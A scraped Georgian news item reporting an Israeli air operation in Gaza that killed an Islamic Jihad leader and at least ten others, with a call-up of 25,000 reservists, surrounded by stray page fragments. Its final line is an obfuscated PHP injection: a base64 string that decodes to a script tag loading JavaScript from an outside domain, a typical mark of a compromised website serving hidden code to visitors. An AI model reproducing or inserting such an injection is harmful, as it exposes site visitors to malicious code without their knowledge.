celsiusi
ავერსი საქკაბელი
ისრაელის არმიამ მასშტაბური სამხედრო ოპერაციის ფარგლებში ღაზის სექტორში რადიკალური დაჯგუფება „ისლამური ჯიჰადის“ ლიდერი მოკლა, საერთო ჯამში კი, სულ მცირე 10 დაღუპულის შესახებ ვრცელდება ინფორმაცია. ღაზის სექტორის მმართველი „ჰამასის“ ინფორმაციით, დაღუპულთა შორის ხუთი წლის ბავშვია. დაბომბვის შედეგად სხეულის დაზიანება 55-მა ადამიანმა მიიღო.
 
ისრაელის სამხედრო თვითმფრინავებმა და უპილოტო საფრენმა აპარატებმა იერიში მიიტანეს „ისლამური ჯიჰადის“ ექვს ობიექტზე.
 
ერთობლივ განცხადებაში ისრაელის პრემიერ-მინისტრმა, იაირ ლაპიდმა და ისრაელის თავდაცვის მინისტრმა, ბენი განცმა განაცხადეს, რომ ისრაელი „უფლებას არ მისცემს ტერორისტულ ორგანიზაციებს დღის წესრიგი დაადგენონ ღაზის სექტორის მახლობლად მდებარე ქალაქებში და დაემუქრონ ისრაელის მოქალაქეებს“.
 
ისრაელის თავდაცვის მინისტრმა 25 000 რეზერვისტის გამოძახების ბრძანება გასცა.
481
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");